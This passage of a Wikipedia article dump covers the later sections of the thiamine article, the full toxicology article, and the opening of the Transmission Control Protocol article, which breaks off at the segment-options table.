vertebrate liver, but its role remains unknown. AThTP is present in E. coli, where it accumulates as a result of carbon starvation. In this bacterium, AThTP may account for up to of total thiamine. It also exists in lesser amounts in yeast, roots of higher plants and animal tissue. Medical uses During pregnancy, thiamine is sent to the fetus via the placenta. Pregnant women have a greater requirement for the vitamin than other adults, especially during the third trimester. Pregnant women with hyperemesis gravidarum are at an increased risk of thiamine deficiency due to losses when vomiting. In lactating women, thiamine is delivered in breast milk even if it results in thiamine deficiency in the mother. Thiamine is important not only for mitochondrial membrane development, but also for synaptic membrane function. It has also been suggested that a deficiency hinders brain development in infants and may be a cause of sudden infant death syndrome. Dietary recommendations The US National Academy of Medicine updated the Estimated Average Requirements (EARs) and Recommended Dietary Allowances (RDAs) for thiamine in 1998. The EARs for thiamine for women and men aged 14 and over are 0.9 mg/day and 1.1 mg/day, respectively; the RDAs are 1.1 and 1.2 mg/day, respectively. RDAs are higher than EARs to provide adequate intake levels for individuals with higher than average requirements. The RDA during pregnancy and for lactating females is 1.4 mg/day. For infants up to the age of 12 months, the Adequate Intake (AI) is 0.2–0.3 mg/day and for children aged 1–13 years the RDA increases with age from 0.5 to 0.9 mg/day. The European Food Safety Authority (EFSA) refers to the collective set of information as Dietary Reference Values, with Population Reference Intakes (PRIs) instead of RDAs, and Average Requirements instead of EARs. For women (including those pregnant or lactating), men and children the PRI is 0.1 mg thiamine per megajoule (MJ) of energy in their diet. As the conversion is 1 MJ = 239 kcal, an adult consuming 2390 kilocalories ought to be consuming 1.0 mg thiamine. This is slightly lower than the US RDA. Neither the National Academy of Medicine nor EFSA have set an upper intake level for thiamine, as there is no human data for adverse effects from high doses. Safety Thiamine is generally well tolerated and non-toxic when administered orally. There are rare reports of adverse side effects when thiamine is given intravenously, including allergic reactions, nausea, lethargy, and impaired coordination. Labeling For US food and dietary supplement labeling purposes, the amount in a serving is expressed as a percent of Daily Value. Since 27 May 2016, the Daily Value has been 1.2 mg, in line with the RDA. Sources Thiamine is found in a wide variety of processed and whole foods, including lentils, peas, whole grains, pork, and nuts. A typical daily prenatal vitamin product contains around 1.5 mg of thiamine. Food fortification Some countries require or recommend fortification of grain foods such as wheat, rice or maize (corn) because processing lowers vitamin content. As of February 2022, 59 countries, mostly in North and Sub-Saharan Africa, require food fortification of wheat, rice or maize with thiamine or thiamine mononitrate. The amounts stipulated range from 2.0 to 10.0 mg/kg. An additional 18 countries have a voluntary fortification program. For example, the Indian government recommends 3.5 mg/kg for "maida" (white) and "atta" (whole wheat) flour. Synthesis Biosynthesis Thiamine biosynthesis occurs in bacteria, some protozoans, plants, and fungi. The thiazole and pyrimidine moieties are biosynthesized separately and are then combined to form ThMP by the action of thiamine-phosphate synthase. The pyrimidine ring system is formed in a reaction catalysed by phosphomethylpyrimidine synthase (ThiC), an enzyme in the radical SAM superfamily of iron–sulfur proteins, which use S-adenosyl methionine as a cofactor. The starting material is 5-aminoimidazole ribotide, which undergoes a rearrangement reaction via radical intermediates which incorporate the blue, green and red fragments shown into the product. The thiazole ring is formed in a reaction catalysed by thiazole synthase (EC 2.8.1.10). The ultimate precursors are 1-deoxy-D-xylulose 5-phosphate, 2-iminoacetate and a sulfur carrier protein called ThiS. An additional protein, ThiG, is also required to bring together all the components of the ring at the enzyme active site. The final step to form ThMP involves decarboxylation of the thiazole intermediate, which reacts with the pyrophosphate derivative of phosphomethylpyrimidine, itself a product of a kinase, phosphomethylpyrimidine kinase. The biosynthetic pathways differ among organisms. In E. coli and other enterobacteriaceae, ThMP is phosphorylated to the cofactor TPP by a thiamine-phosphate kinase (ThMP + ATP → TPP + ADP). In most bacteria and in eukaryotes, ThMP is hydrolyzed to thiamine and then pyrophosphorylated to TPP by thiamine diphosphokinase (thiamine + ATP → TPP + AMP). The biosynthetic pathways are regulated by riboswitches. If there is sufficient thiamine present in the cell then the thiamine binds to the mRNAs for the enzymes that are required in the pathway and prevents their translation. If there is no thiamine present then there is no inhibition, and the enzymes required for the biosynthesis are produced. The specific riboswitch, the TPP riboswitch, is the only known riboswitch found in both eukaryotic and prokaryotic organisms. Laboratory synthesis In the first total synthesis in 1936, ethyl 3-ethoxypropanoate was treated with ethyl formate to give an intermediate dicarbonyl compound which when reacted with acetamidine formed a substituted pyrimidine. Conversion of its hydroxyl group to an amino group was carried out by nucleophilic aromatic substitution, first to the chloride derivative using phosphorus oxychloride, followed by treatment with ammonia. The ethoxy group was then converted to a bromo derivative using hydrobromic acid. In the final stage, thiamine (as its dibromide salt) was formed in an alkylation reaction using 4-methyl-5-(2-hydroxyethyl)thiazole. Industrial synthesis Merck & Co. adapted the 1936 laboratory-scale synthesis, allowing them to manufacture thiamine in Rahway in 1937. However, an alternative route using the intermediate Grewe diamine (5-(aminomethyl)-2-methyl-4-pyrimidinamine), first published in 1937, was investigated by Hoffman La Roche and competitive manufacturing processes followed. Efficient routes to the diamine have continued to be of interest. In the European Economic Area, thiamine is registered under REACH regulation and between 100 and 1,000 tonnes per annum are manufactured or imported there. Synthetic analogues Many vitamin B1 analogues, such as Benfotiamine, fursultiamine, and sulbutiamine, are synthetic derivatives of thiamine. Most were developed in Japan in the 1950s and 1960s as forms that were intended to improve absorption compared to thiamine. Some are approved for use in some countries as a drug or non-prescription dietary supplement for treatment of diabetic neuropathy or other health conditions. Absorption, metabolism and excretion In the upper small intestine, thiamine phosphate esters present in food are hydrolyzed by alkaline phosphatase enzymes. At low concentrations (<2 μmol l−1), the absorption process is carrier-mediated. At higher concentrations, absorption also occurs via passive diffusion. Active transport can be inhibited by alcohol consumption or by folate deficiency. The majority of thiamine in serum is circulating bound to albumin, with over () in erythrocytes (red blood cells), and is delivered to cells with high metabolic needs—particularly those in the brain, liver, pancreas, heart, and skeletal and smooth muscles, including cardiac muscle cells. A specific binding protein called thiamine-binding protein has been identified in rat serum and is believed to be a hormone-regulated carrier protein important for tissue distribution of thiamine. Uptake of thiamine by cells of the blood and other tissues occurs via active transport and passive diffusion. Two members of the family of transporter proteins encoded by the genes SLC19A2 and SLC19A3 are capable of thiamine transport. In some tissues, thiamine uptake and secretion appear to be mediated by a Na+-dependent transporter and a transcellular proton gradient. Human storage of thiamine is about 25 to 50 mg, with the greatest concentrations in liver, skeletal muscle, heart, brain, and kidneys. ThMP and free (unphosphorylated) thiamine are present in plasma, milk, cerebrospinal fluid, and, it is presumed, all extracellular fluid. Unlike the highly phosphorylated forms of thiamine, ThMP and free thiamine are capable of crossing cell membranes. Calcium and magnesium have been shown to affect the distribution of thiamine in the body and magnesium deficiency has been shown to aggravate thiamine deficiency. Thiamine contents in human tissues are less than those of other species. The half-life of thiamine content stored in tissues of human body is about 9-18 days, while after intake in high doses, the half-life of thiamine in circulating blood is about one to 12 hours. Additionally, thiamine pyrophosphate derived from pyrimidines supports lipid synthesis and adipogenesis, highlighting its role in energy storage and cellular differentiation. Thiamine and its metabolites (2-methyl-4-amino-5-pyrimidine carboxylic acid, 4-methyl-thiazole-5-acetic acid, and others) are excreted principally in the urine. Interference The bioavailability of thiamine in foods can be interfered with in a variety of ways. Sulfites, added to foods as a preservative, will attack thiamine at the methylene bridge, cleaving the pyrimidine ring from the thiazole ring. The rate of this reaction is increased under acidic conditions. Thiamine is degraded by thermolabile thiaminases present in some species of fish, shellfish and other foods. The pupae of an African silk worm, Anaphe venata, is a traditional food in Nigeria. Consumption leads to thiamine deficiency. Older literature reported that in Thailand, consumption of fermented, uncooked fish caused thiamine deficiency, but either abstaining from eating the fish or heating it first reversed the deficiency. In ruminants, intestinal bacteria synthesize thiamine and thiaminases. The bacterial thiaminases are cell surface enzymes that must dissociate from the cell membrane before being activated; the dissociation can occur in ruminants under acidotic conditions. In dairy cows, over-feeding with grain causes subacute ruminal acidosis and increased ruminal bacteria thiaminase release, resulting in thiamine deficiency. From reports on two small studies conducted in Thailand, chewing slices of areca nut wrapped in betel leaves and chewing tea leaves reduced food thiamine bioavailability by a mechanism that may involve tannins. Bariatric surgery for weight loss is known to interfere with vitamin absorption. A meta-analysis reported that of people who underwent bariatric surgeries experience vitamin B1 deficiency. History Thiamine was the first of the water-soluble vitamins to be isolated. The earliest observations in humans and in chickens had shown that diets of primarily polished white rice caused beriberi, but did not attribute it to the absence of a previously unknown essential nutrient. In 1884, Takaki Kanehiro, a surgeon general in the Imperial Japanese Navy, rejected the previous germ theory for beriberi and suggested instead that the disease was due to insufficiencies in the diet. Switching diets on a navy ship, he discovered that replacing a diet of white rice only with one also containing barley, meat, milk, bread, and vegetables, nearly eliminated beriberi on a nine-month sea voyage. However, Takaki had added many foods to the successful diet and he incorrectly attributed the benefit to increased protein intake, as vitamins were unknown at the time. The Navy was not convinced of the need for such an expensive program of dietary improvement, and many men continued to die of beriberi, even during the Russo-Japanese war of 1904–5. Not until 1905, after the anti-beriberi factor had been discovered in rice bran (removed by polishing into white rice) and in barley bran, was Takaki's experiment rewarded. He was made a baron in the Japanese peerage system, after which he was affectionately called "Barley Baron". The specific connection to grain was made in 1897 by Christiaan Eijkman, a military doctor in the Dutch East Indies, who discovered that fowl fed on a diet of cooked, polished rice developed paralysis that could be reversed by discontinuing rice polishing. He attributed beriberi to the high levels of starch in rice being toxic. He believed that the toxicity was countered in a compound present in the rice polishings. An associate, Gerrit Grijns, correctly interpreted the connection between excessive consumption of polished rice and beriberi in 1901: He concluded that rice contains an essential nutrient in the outer layers of the grain that is removed by polishing. Eijkman was eventually awarded the Nobel Prize in Physiology and Medicine in 1929, because his observations led to the discovery of vitamins. In 1910, a Japanese agricultural chemist of Tokyo Imperial University, Umetaro Suzuki, isolated a water-soluble thiamine compound from rice bran, which he named aberic acid. (He later renamed it Orizanin.) He described the compound as not only an anti-beriberi factor, but also as being essential to human nutrition; however, this finding failed to gain publicity outside of Japan, because a claim that the compound was a new finding was omitted in translation of his publication from Japanese to German. In 1911 a Polish biochemist Casimir Funk isolated the antineuritic substance from rice bran (the modern thiamine) that he called a "vitamine" (on account of its containing an amino group). However, Funk did not completely characterize its chemical structure. Dutch chemists, Barend Coenraad Petrus Jansen and his closest collaborator Willem Frederik Donath, went on to isolate and crystallize the active agent in 1926, whose structure was determined by Robert Runnels Williams, in 1934. Thiamine was named by the Williams team as a portmanteau of "thio" (meaning sulfur-containing) and "vitamin". The term "vitamin" coming indirectly, by way of Funk, from the amine group of thiamine itself (although by this time, vitamins were known to not always be amines, for example, vitamin C). Thiamine was also synthesized by the Williams group in 1936. Sir Rudolph Peters, in Oxford, used pigeons to understand how thiamine deficiency results in the pathological-physiological symptoms of beriberi. Pigeons fed exclusively on polished rice developed opisthotonos, a condition characterized by head retraction. If not treated, the animals died after a few days. Administration of thiamine after opisthotonos was observed led to a complete cure within 30 minutes. As no morphological modifications were seen in the brain of the pigeons before and after treatment with thiamine, Peters introduced the concept of a biochemical-induced injury. In 1937, Lohmann and Schuster showed that the diphosphorylated thiamine derivative, TPP, was a cofactor required for the oxidative decarboxylation of pyruvate.
Biology and health sciences
Vitamins
Health
30531
https://en.wikipedia.org/wiki/Toxicology
Toxicology
Toxicology is a scientific discipline, overlapping with biology, chemistry, pharmacology, and medicine, that involves the study of the adverse effects of chemical substances on living organisms and the practice of diagnosing and treating exposures to toxins and toxicants. The relationship between dose and its effects on the exposed organism is of high significance in toxicology. Factors that influence chemical toxicity include the dosage, duration of exposure (whether it is acute or chronic), route of exposure, species, age, sex, and environment. Toxicologists are experts on poisons and poisoning. There is a movement for evidence-based toxicology as part of the larger movement towards evidence-based practices. Toxicology is currently contributing to the field of cancer research, since some toxins can be used as drugs for killing tumor cells. One prime example of this is ribosome-inactivating proteins, tested in the treatment of leukemia. The word toxicology () is a neoclassical compound from Neo-Latin, first attested , from the combining forms toxico- + -logy, which in turn come from the Ancient Greek words τοξικός toxikos, "poisonous", and λόγος logos, "subject matter"). History The earliest treatise dedicated to the general study of plant and animal poisons, including their classification, recognition, and the treatment of their effects is the Kalpasthāna, one of the major sections of the Suśrutasaṃhitā, a Sanskrit work composed before ca. 300 CE and perhaps in part as early as the fourth century BCE. The Kalpasthāna was influential on many later Sanskrit medical works and was translated into Arabic and other languages, influencing South East Asia, the Middle East, Tibet and eventually Europe. Dioscorides, a Greek physician in the court of the Roman emperor Nero, made an early attempt to classify plants according to their toxic and therapeutic effect. A work attributed to the 10th century author Ibn Wahshiyya called the Book on Poisons describes various toxic substances and poisonous recipes that can be made using magic. A 14th century Kannada poetic work attributed to the Jain prince Mangarasa, Khagendra Mani Darpana, describes several poisonous plants. The 16th-century Swiss physician Paracelsus is considered "the father" of modern toxicology, based on his rigorous (for the time) approach to understanding the effects of substances on the body. He is credited with the classic toxicology maxim, "Alle Dinge sind Gift und nichts ist ohne Gift; allein die Dosis macht, dass ein Ding kein Gift ist." which translates as, "All things are poisonous and nothing is without poison; only the dose makes a thing not poisonous." This is often condensed to: "The dose makes the poison" or in Latin "Sola dosis facit venenum". Mathieu Orfila is also considered the modern father of toxicology, having given the subject its first formal treatment in 1813 in his Traité des poisons, also called Toxicologie générale. In 1850, Jean Stas became the first person to successfully isolate plant poisons from human tissue. This allowed him to identify the use of nicotine as a poison in the Bocarmé murder case, providing the evidence needed to convict the Belgian Count Hippolyte Visart de Bocarmé of killing his brother-in-law. Basic principles The goal of toxicity assessment is to identify adverse effects of a substance. Adverse effects depend on two main factors: i) routes of exposure (oral, inhalation, or dermal) and ii) dose (duration and concentration of exposure). To explore dose, substances are tested in both acute and chronic models. Generally, different sets of experiments are conducted to determine whether a substance causes cancer and to examine other forms of toxicity. Factors that influence chemical toxicity: Dosage Both large single exposures (acute) and continuous small exposures (chronic) are studied. Route of exposure Ingestion, inhalation or skin absorption Other factors Species Age Sex Health Environment Individual characteristics The discipline of evidence-based toxicology strives to transparently, consistently, and objectively assess available scientific evidence in order to answer questions in toxicology, the study of the adverse effects of chemical, physical, or biological agents on living organisms and the environment, including the prevention and amelioration of such effects. Evidence-based toxicology has the potential to address concerns in the toxicological community about the limitations of current approaches to assessing the state of the science. These include concerns related to transparency in decision-making, synthesis of different types of evidence, and the assessment of bias and credibility. Evidence-based toxicology has its roots in the larger movement towards evidence-based practices. Testing methods Toxicity experiments may be conducted in vivo (using the whole animal) or in vitro (testing on isolated cells or tissues), or in silico (in a computer simulation). In vivo model organism The classic experimental tool of toxicology is testing on non-human animals. Examples of model organisms are Galleria mellonella, which can replace small mammals, Zebrafish (Danio rerio), which allow for the study of toxicology in a lower order vertebrate in vivo and Caenorhabditis elegans. As of 2014, such animal testing provides information that is not available by other means about how substances function in a living organism. The use of non-human animals for toxicology testing is opposed by some organisations for reasons of animal welfare, and it has been restricted or banned under some circumstances in certain regions, such as the testing of cosmetics in the European Union. In vitro methods While testing in animal models remains as a method of estimating human effects, there are both ethical and technical concerns with animal testing. Since the late 1950s, the field of toxicology has sought to reduce or eliminate animal testing under the rubric of "Three Rs" – reduce the number of experiments with animals to the minimum necessary; refine experiments to cause less suffering, and replace in vivo experiments with other types, or use more simple forms of life when possible. The historical development of alternative testing methods in toxicology has been published by Balls. Computer modeling is an example of an alternative in vitro toxicology testing method; using computer models of chemicals and proteins, structure-activity relationships can be determined, and chemical structures that are likely to bind to, and interfere with, proteins with essential functions, can be identified. This work requires expert knowledge in molecular modeling and statistics together with expert judgment in chemistry, biology and toxicology. In 2007 the American NGO National Academy of Sciences published a report called "Toxicity Testing in the 21st Century: A Vision and a Strategy" which opened with a statement: "Change often involves a pivotal event that builds on previous history and opens the door to a new era. Pivotal events in science include the discovery of penicillin, the elucidation of the DNA double helix, and the development of computers. ... Toxicity testing is approaching such a scientific pivot point. It is poised to take advantage of the revolutions in biology and biotechnology. Advances in toxicogenomics, bioinformatics, systems biology, epigenetics, and computational toxicology could transform toxicity testing from a system based on whole-animal testing to one founded primarily on in vitro methods that evaluate changes in biologic processes using cells, cell lines, or cellular components, preferably of human origin." As of 2014 that vision was still unrealized. The United States Environmental Protection Agency studied 1,065 chemical and drug substances in their ToxCast program (part of the CompTox Chemicals Dashboard) using in silica modelling and a human pluripotent stem cell-based assay to predict in vivo developmental intoxicants based on changes in cellular metabolism following chemical exposure. Major findings from the analysis of this ToxCast_STM dataset published in 2020 include: (1) 19% of 1065 chemicals yielded a prediction of developmental toxicity, (2) assay performance reached 79%–82% accuracy with high specificity (> 84%) but modest sensitivity (< 67%) when compared with in vivo animal models of human prenatal developmental toxicity, (3) sensitivity improved as more stringent weights of evidence requirements were applied to the animal studies, and (4) statistical analysis of the most potent chemical hits on specific biochemical targets in ToxCast revealed positive and negative associations with the STM response, providing insights into the mechanistic underpinnings of the targeted endpoint and its biological domain. In some cases shifts away from animal studies have been mandated by law or regulation; the European Union (EU) prohibited use of animal testing for cosmetics in 2013. Dose response complexities Most chemicals display a classic dose response curve – at a low dose (below a threshold), no effect is observed. Some show a phenomenon known as sufficient challenge – a small exposure produces animals that "grow more rapidly, have better general appearance and coat quality, have fewer tumors, and live longer than the control animals". A few chemicals have no well-defined safe level of exposure. These are treated with special care. Some chemicals are subject to bioaccumulation as they are stored in rather than being excreted from the body; these also receive special consideration. Several measures are commonly used to describe toxic dosages according to the degree of effect on an organism or a population, and some are specifically defined by various laws or organizational usage. These include: LD50 or LD50 = Median lethal dose, a dose that will kill 50% of an exposed population NOEL = No-Observed-Effect-Level, the highest dose known to show no effect NOAEL = No-Observed-Adverse-Effect-Level, the highest dose known to show no adverse effects PEL = Permissible Exposure Limit, the highest concentration permitted under US OSHA regulations STEL = Short-Term Exposure Limit, the highest concentration permitted for short periods of time, in general 15–30 minutes TWA = Time-Weighted Average, the average amount of an agent's concentration over a specified period of time, usually 8 hours TTC = The Threshold of Toxicological Concern concept has been applied to low-level contaminants, such as the constituents of tobacco smoke Types Medical toxicology is the discipline that requires physician status (MD or DO degree plus specialty education and experience). Clinical toxicology is the discipline that can be practiced not only by physicians but also other health professionals with a master's degree in clinical toxicology: physician extenders (physician assistants, nurse practitioners), nurses, pharmacists, and allied health professionals. Forensic toxicology is the discipline that makes use of toxicology and other disciplines such as analytical chemistry, pharmacology and clinical chemistry to aid medical or legal investigation of death, poisoning, and drug use. The primary concern for forensic toxicology is not the legal outcome of the toxicological investigation or the technology utilized, but rather the obtainment and interpretation of results. Computational toxicology is a discipline that develops mathematical and computer-based models to better understand and predict adverse health effects caused by chemicals, such as environmental pollutants and pharmaceuticals. Within the Toxicology in the 21st Century project, the best predictive models were identified to be Deep Neural Networks, Random Forest, and Support Vector Machines, which can reach the performance of in vitro experiments. Occupational toxicology is the application of toxicology to chemical hazards in the workplace. Toxicology as a profession A toxicologist is a scientist or medical personnel who specializes in the study of symptoms, mechanisms, treatments and detection of venoms and toxins; especially the poisoning of people. Requirements To work as a toxicologist one should obtain a degree in toxicology or a related degree like biology, chemistry, pharmacology or biochemistry. Bachelor's degree programs in toxicology cover the chemical makeup of toxins and their effects on biochemistry, physiology and ecology. After introductory life science courses are complete, students typically enroll in labs and apply toxicology principles to research and other studies. Advanced students delve into specific sectors, like the pharmaceutical industry or law enforcement, which apply methods of toxicology in their work. The Society of Toxicology (SOT) recommends that undergraduates in postsecondary schools that do not offer a bachelor's degree in toxicology consider attaining a degree in biology or chemistry. Additionally, the SOT advises aspiring toxicologists to take statistics and mathematics courses, as well as gain laboratory experience through lab courses, student research projects and internships. To become Medical Toxicologists, physicians in the United States complete residency training such as in Emergency Medicine, Pediatrics or Internal Medicine, followed by fellowship in Medical Toxicology and eventual certification by the American College of Medical Toxicology (ACMT). Duties Toxicologists perform many different duties including research in the academic, nonprofit and industrial fields, product safety evaluation, consulting, public service and legal regulation. In order to research and assess the effects of chemicals, toxicologists perform carefully designed studies and experiments. These experiments help identify the specific amount of a chemical that may cause harm and potential risks of being near or using products that contain certain chemicals. Research projects may range from assessing the effects of toxic pollutants on the environment to evaluating how the human immune system responds to chemical compounds within pharmaceutical drugs. While the basic duties of toxicologists are to determine the effects of chemicals on organisms and their surroundings, specific job duties may vary based on industry and employment. For example, forensic toxicologists may look for toxic substances in a crime scene, whereas aquatic toxicologists may analyze the toxicity level of water bodies. Compensation The salary for jobs in toxicology is dependent on several factors, including level of schooling, specialization, experience. The U.S. Bureau of Labor Statistics (BLS) notes that jobs for biological scientists, which generally include toxicologists, were expected to increase by 21% between 2008 and 2018. The BLS notes that this increase could be due to research and development growth in biotechnology, as well as budget increases for basic and medical research in biological science.
Biology and health sciences
Fields of medicine
null
30538
https://en.wikipedia.org/wiki/Transmission%20Control%20Protocol
Transmission Control Protocol
The Transmission Control Protocol (TCP) is one of the main protocols of the Internet protocol suite. It originated in the initial network implementation in which it complemented the Internet Protocol (IP). Therefore, the entire suite is commonly referred to as TCP/IP. TCP provides reliable, ordered, and error-checked delivery of a stream of octets (bytes) between applications running on hosts communicating via an IP network. Major internet applications such as the World Wide Web, email, remote administration, and file transfer rely on TCP, which is part of the transport layer of the TCP/IP suite. SSL/TLS often runs on top of TCP. TCP is connection-oriented, meaning that sender and receiver firstly need to establish a connection based on agreed parameters; they do this through three-way handshake procedure. The server must be listening (passive open) for connection requests from clients before a connection is established. Three-way handshake (active open), retransmission, and error detection adds to reliability but lengthens latency. Applications that do not require reliable data stream service may use the User Datagram Protocol (UDP) instead, which provides a connectionless datagram service that prioritizes time over reliability. TCP employs network congestion avoidance. However, there are vulnerabilities in TCP, including denial of service, connection hijacking, TCP veto, and reset attack. Historical origin In May 1974, Vint Cerf and Bob Kahn described an internetworking protocol for sharing resources using packet switching among network nodes. The authors had been working with Gérard Le Lann to incorporate concepts from the French CYCLADES project into the new network. The specification of the resulting protocol, (Specification of Internet Transmission Control Program), was written by Vint Cerf, Yogen Dalal, and Carl Sunshine, and published in December 1974. It contains the first attested use of the term internet, as a shorthand for internetwork. The Transmission Control Program incorporated both connection-oriented links and datagram services between hosts. In version 4, the monolithic Transmission Control Program was divided into a modular architecture consisting of the Transmission Control Protocol and the Internet Protocol. This resulted in a networking model that became known informally as TCP/IP, although formally it was variously referred to as the DoD internet architecture model (DoD model for short) or DARPA model. Later, it became the part of, and synonymous with, the Internet Protocol Suite. The following Internet Experiment Note (IEN) documents describe the evolution of TCP into the modern version: IEN 5 Specification of Internet Transmission Control Program TCP Version 2 (March 1977). IEN 21 Specification of Internetwork Transmission Control Program TCP Version 3 (January 1978). IEN 27 IEN 40 IEN 44 IEN 55 IEN 81 IEN 112 IEN 124 TCP was standardized in January 1980 as . In 2004, Vint Cerf and Bob Kahn received the Turing Award for their foundational work on TCP/IP. Network function The Transmission Control Protocol provides a communication service at an intermediate level between an application program and the Internet Protocol. It provides host-to-host connectivity at the transport layer of the Internet model. An application does not need to know the particular mechanisms for sending data via a link to another host, such as the required IP fragmentation to accommodate the maximum transmission unit of the transmission medium. At the transport layer, TCP handles all handshaking and transmission details and presents an abstraction of the network connection to the application typically through a network socket interface. At the lower levels of the protocol stack, due to network congestion, traffic load balancing, or unpredictable network behavior, IP packets may be lost, duplicated, or delivered out of order. TCP detects these problems, requests re-transmission of lost data, rearranges out-of-order data and even helps minimize network congestion to reduce the occurrence of the other problems. If the data still remains undelivered, the source is notified of this failure. Once the TCP receiver has reassembled the sequence of octets originally transmitted, it passes them to the receiving application. Thus, TCP abstracts the application's communication from the underlying networking details. TCP is used extensively by many internet applications, including the World Wide Web (WWW), email, File Transfer Protocol, Secure Shell, peer-to-peer file sharing, and streaming media. TCP is optimized for accurate delivery rather than timely delivery and can incur relatively long delays (on the order of seconds) while waiting for out-of-order messages or re-transmissions of lost messages. Therefore, it is not particularly suitable for real-time applications such as voice over IP. For such applications, protocols like the Real-time Transport Protocol (RTP) operating over the User Datagram Protocol (UDP) are usually recommended instead. TCP is a reliable byte stream delivery service that guarantees that all bytes received will be identical and in the same order as those sent. Since packet transfer by many networks is not reliable, TCP achieves this using a technique known as positive acknowledgment with re-transmission. This requires the receiver to respond with an acknowledgment message as it receives the data. The sender keeps a record of each packet it sends and maintains a timer from when the packet was sent. The sender re-transmits a packet if the timer expires before receiving the acknowledgment. The timer is needed in case a packet gets lost or corrupted. While IP handles actual delivery of the data, TCP keeps track of segments – the individual units of data transmission that a message is divided into for efficient routing through the network. For example, when an HTML file is sent from a web server, the TCP software layer of that server divides the file into segments and forwards them individually to the internet layer in the network stack. The internet layer software encapsulates each TCP segment into an IP packet by adding a header that includes (among other data) the destination IP address. When the client program on the destination computer receives them, the TCP software in the transport layer re-assembles the segments and ensures they are correctly ordered and error-free as it streams the file contents to the receiving application. TCP segment structure Transmission Control Protocol accepts data from a data stream, divides it into chunks, and adds a TCP header creating a TCP segment. The TCP segment is then encapsulated into an Internet Protocol (IP) datagram, and exchanged with peers. The term TCP packet appears in both informal and formal usage, whereas in more precise terminology segment refers to the TCP protocol data unit (PDU), datagram to the IP PDU, and frame to the data link layer PDU: Processes transmit data by calling on the TCP and passing buffers of data as arguments. The TCP packages the data from these buffers into segments and calls on the internet module [e.g. IP] to transmit each segment to the destination TCP. A TCP segment consists of a segment header and a data section. The segment header contains 10 mandatory fields, and an optional extension field (Options, pink background in table). The data section follows the header and is the payload data carried for the application. The length of the data section is not specified in the segment header; it can be calculated by subtracting the combined length of the segment header and IP header from the total IP datagram length specified in the IP header. Some options may only be sent when SYN is set; they are indicated below as [SYN]. Option-Kind and standard lengths given as (Option-Kind, Option-Length). {| class="wikitable" |- ! Option-Kind ! Option-Length ! Option-Data ! Purpose !
Technology
Internet
null